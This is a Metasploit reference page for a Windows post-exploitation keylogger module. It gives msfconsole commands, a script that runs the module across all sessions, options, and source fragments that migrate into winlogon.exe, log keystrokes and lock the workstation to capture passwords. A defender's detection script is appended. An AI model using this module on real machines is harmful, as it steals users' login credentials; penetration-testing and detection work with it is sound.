Windows Capture Winlogon Lockout Credential Keylogger - Metasploit
This page contains detailed information about how to use the post/windows/capture/lockout_keylogger Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Capture Winlogon Lockout Credential Keylogger
Module: post/windows/capture/lockout_keylogger
Source code: modules/post/windows/capture/lockout_keylogger.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module migrates and logs Microsoft Windows user's passwords via Winlogon.exe using idle time and natural system changes to give a false sense of security to the user.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/capture/lockout_keylogger
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/capture/lockout_keylogger
msf post(lockout_keylogger) > show options
... show and set options ...
msf post(lockout_keylogger) > set SESSION session-id
msf post(lockout_keylogger) > exploit
If you wish to run the post module against all sessions from the framework, here is how:
1 - Create the following resource script:
<ruby>
# Ruby inside a resource script must be wrapped in <ruby> ... </ruby> tags
framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/capture/lockout_keylogger")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Msfconsole Usage
Here is how the windows/capture/lockout_keylogger post exploitation module looks in the msfconsole:
msf6 > use post/windows/capture/lockout_keylogger
msf6 post(windows/capture/lockout_keylogger) > show info
Name: Windows Capture Winlogon Lockout Credential Keylogger
Module: post/windows/capture/lockout_keylogger
Platform: Windows
Arch:
Rank: Normal
Provided by:
mubix <[email protected]>
cg
Compatible session types:
Meterpreter
Basic options:
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
HEARTBEAT  30               yes       Heart beat between idle checks
INTERVAL   30               yes       Time between key collection during logging
LOCKTIME   300              yes       Amount of idle time before lockout
PID                         no        Target PID, only needed if multiple winlogon.exe instances exist
SESSION                     yes       The session to run this module on.
WAIT       false            yes       Wait for lockout instead of default method
Description:
This module migrates and logs Microsoft Windows user's passwords via
Winlogon.exe using idle time and natural system changes to give a
false sense of security to the user.
References:
http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html
Module Options
This is a complete list of options available in the windows/capture/lockout_keylogger post exploitation module:
msf6 post(windows/capture/lockout_keylogger) > show options
Module options (post/windows/capture/lockout_keylogger):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
HEARTBEAT  30               yes       Heart beat between idle checks
INTERVAL   30               yes       Time between key collection during logging
LOCKTIME   300              yes       Amount of idle time before lockout
PID                         no        Target PID, only needed if multiple winlogon.exe instances exist
SESSION                     yes       The session to run this module on.
WAIT       false            yes       Wait for lockout instead of default method
Advanced Options
Here is a complete list of advanced options supported by the windows/capture/lockout_keylogger post exploitation module:
msf6 post(windows/capture/lockout_keylogger) > show advanced
Module advanced options (post/windows/capture/lockout_keylogger):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
VERBOSE    false            no        Enable detailed status messages
WORKSPACE                   no        Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/capture/lockout_keylogger module can do:
msf6 post(windows/capture/lockout_keylogger) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/capture/lockout_keylogger post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/capture/lockout_keylogger) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- Winlogon not found! Exiting
- Multiple WINLOGON processes found, run manually and specify pid
- Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session
- Failed to start Keylogging!
- This module does not support this platform.
- Must be an admin to migrate into Winlogon.exe, exiting
- Already in WINLOGON no need to migrate
- Unable to migrate, try getsystem first
- Locking the workstation falied, trying again..
- The system will not lock this session, nor will it be used for user login, exiting...
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Winlogon not found! Exiting
Here is a relevant code snippet related to the "Winlogon not found! Exiting" error message:
      if x['name'].downcase == "winlogon.exe"
        winlogon << x
      end
    end
    if winlogon.size == 0
      print_status("Winlogon not found! Exiting")
      return 'exit'
    elsif winlogon.size == 1
      return winlogon[0]['pid']
    else
      print_error("Multiple WINLOGON processes found, run manually and specify pid")
Multiple WINLOGON processes found, run manually and specify pid
Here is a relevant code snippet related to the "Multiple WINLOGON processes found, run manually and specify pid" error message:
      print_status("Winlogon not found! Exiting")
      return 'exit'
    elsif winlogon.size == 1
      return winlogon[0]['pid']
    else
      print_error("Multiple WINLOGON processes found, run manually and specify pid")
      print_error("Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session")
      winlogon.each do |tp|
        print_status("Winlogon.exe - PID: #{tp['pid']} - Session: #{tp['session']}")
      end
      return 'exit'
Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session
Here is a relevant code snippet related to the "Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session" error message:
      return 'exit'
    elsif winlogon.size == 1
      return winlogon[0]['pid']
    else
      print_error("Multiple WINLOGON processes found, run manually and specify pid")
      print_error("Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session")
      winlogon.each do |tp|
        print_status("Winlogon.exe - PID: #{tp['pid']} - Session: #{tp['session']}")
      end
      return 'exit'
    end
Failed to start Keylogging!
Here is a relevant code snippet related to the "Failed to start Keylogging!" error message:
    begin
      print_status("Starting the keystroke sniffer...")
      session.ui.keyscan_start
      return true
    rescue
      print_error("Failed to start Keylogging!")
      return false
    end
  end

  # Function for Collecting Capture (pulled from Carlos Perez's Keylogrecorder)
This module does not support this platform.
Here is a relevant code snippet related to the "This module does not support this platform." error message:
    ::FileUtils.mkdir_p(logs) # Create the log directory
    logfile = logs + ::File::Separator + host + filenameinfo + ".txt" # Logfile name

    # Make sure we are on a Windows host
    if client.platform != 'windows'
      print_error('This module does not support this platform.')
      return
    end

    # Check admin status
    admin = check_admin
Must be an admin to migrate into Winlogon.exe, exiting
Here is a relevant code snippet related to the "Must be an admin to migrate into Winlogon.exe, exiting" error message:
    end

    # Check admin status
    admin = check_admin
    if admin == false
      print_error("Must be an admin to migrate into Winlogon.exe, exiting")
      return
    end

    mypid = session.sys.process.getpid
    if datastore['PID'] == 0
Already in WINLOGON no need to migrate
Here is a relevant code snippet related to the "Already in WINLOGON no need to migrate" error message:
      targetpid = datastore['PID']
      print_status("WINLOGON PID:#{targetpid} specified. I'm trusting you...")
    end

    if mypid == targetpid
      print_status("Already in WINLOGON no need to migrate")
    else
      print_status("Migrating from PID:#{mypid}")
      begin
        session.core.migrate(targetpid)
      rescue
Unable to migrate, try getsystem first
Here is a relevant code snippet related to the "Unable to migrate, try getsystem first" error message:
    else
      print_status("Migrating from PID:#{mypid}")
      begin
        session.core.migrate(targetpid)
      rescue
        print_error("Unable to migrate, try getsystem first")
        return
      end
      print_good("Migrated to WINLOGON PID: #{targetpid} successfully")
    end

Locking the workstation falied, trying again..
Here is a relevant code snippet related to the "Locking the workstation falied, trying again.." error message:
      select(nil, nil, nil, datastore['HEARTBEAT'])
      currentidle = session.ui.idle_time
    end
    client.railgun.user32.LockWorkStation()
    if client.railgun.user32.GetForegroundWindow()['return'] == 0
      print_error("Locking the workstation falied, trying again..")
      client.railgun.user32.LockWorkStation()
      if client.railgun.user32.GetForegroundWindow()['return'] == 0
        print_error("The system will not lock this session, nor will it be used for user login, exiting...")
        return
      else
The system will not lock this session, nor will it be used for user login, exiting...
Here is a relevant code snippet related to the "The system will not lock this session, nor will it be used for user login, exiting..." error message:
    client.railgun.user32.LockWorkStation()
    if client.railgun.user32.GetForegroundWindow()['return'] == 0
      print_error("Locking the workstation falied, trying again..")
      client.railgun.user32.LockWorkStation()
      if client.railgun.user32.GetForegroundWindow()['return'] == 0
        print_error("The system will not lock this session, nor will it be used for user login, exiting...")
        return
      else
        print_status("Locked this time, time to start keyloggin...")
      end
    end
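The description and the migrate/LockWorkStation snippets above show the two observable steps of this module: a non-system process creating a thread in winlogon.exe, then a workstation lock. The following defender-side correlation is an added example, not code from the module or this page; it assumes the migration shows up as Sysmon Event ID 8 (CreateRemoteThread) and the lock as Security event 4800, and the log lines, paths and usernames are constructed.

```python
"""Detection for the behaviour this module exhibits: an untrusted process creating
a thread in winlogon.exe, optionally followed by a workstation lock (Security 4800).
Assumes the migration surfaces as Sysmon Event ID 8 (CreateRemoteThread)."""
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed sample telemetry (not real logs) flattened to key=value pairs;
# field names follow the real Sysmon EID 8 and Security 4800 schemas.
SAMPLE_EVENTS = [
    "2024-05-01T09:00:12Z EventID=8 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\notepad.exe",
    "2024-05-01T09:01:05Z EventID=8 SourceImage=C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe TargetImage=C:\\Windows\\System32\\winlogon.exe",
    "2024-05-01T09:06:40Z EventID=4800 SubjectUserName=bob",
    "2024-05-01T13:30:00Z EventID=4800 SubjectUserName=alice",
]

# Sources that legitimately create threads in winlogon.exe live under System32.
TRUSTED_SOURCE_DIRS = ("c:\\windows\\system32\\",)

def parse_event(line):
    """Split 'timestamp key=value ...' into a dict with a datetime under 'ts'."""
    stamp, *fields = line.split()
    event = dict(field.split("=", 1) for field in fields)
    event["ts"] = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")
    return event

def winlogon_injections(events):
    """EID 8 events whose target is winlogon.exe and whose source is untrusted."""
    hits = []
    for ev in events:
        if ev.get("EventID") != "8":
            continue
        target = PureWindowsPath(ev["TargetImage"]).name.lower()
        source = ev["SourceImage"].lower()
        if target == "winlogon.exe" and not source.startswith(TRUSTED_SOURCE_DIRS):
            hits.append(ev)
    return hits

def correlate(lines, window=timedelta(seconds=600)):
    """Escalate when a 4800 lock follows the injection within `window`. The module's
    default LOCKTIME is 300 s of idle time; with WAIT=true the lock may come later."""
    events = [parse_event(line) for line in lines]
    locks = [ev["ts"] for ev in events if ev.get("EventID") == "4800"]
    findings = []
    for inj in winlogon_injections(events):
        lock_followed = any(inj["ts"] <= t <= inj["ts"] + window for t in locks)
        findings.append({"source": inj["SourceImage"],
                         "lock_followed": lock_followed,
                         "severity": "critical" if lock_followed else "high"})
    return findings
```

Injection into winlogon.exe from outside System32 is alerted on by itself; the lock only raises severity, because with WAIT=true the lock is user-driven and can fall outside any fixed window.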
Related Pull Requests
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #2525 Merged Pull Request: Change module boilerplate
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #2341 Merged Pull Request: Grammar fixes in descriptions
- #2313 Merged Pull Request: Correct module naming style
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #1110 Merged Pull Request: Fix instances of invalid lower-case datastore use
- #958 Merged Pull Request: Msftidy 2
- #952 Merged Pull Request: standardizing author info
Authors
- mubix
- cg
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.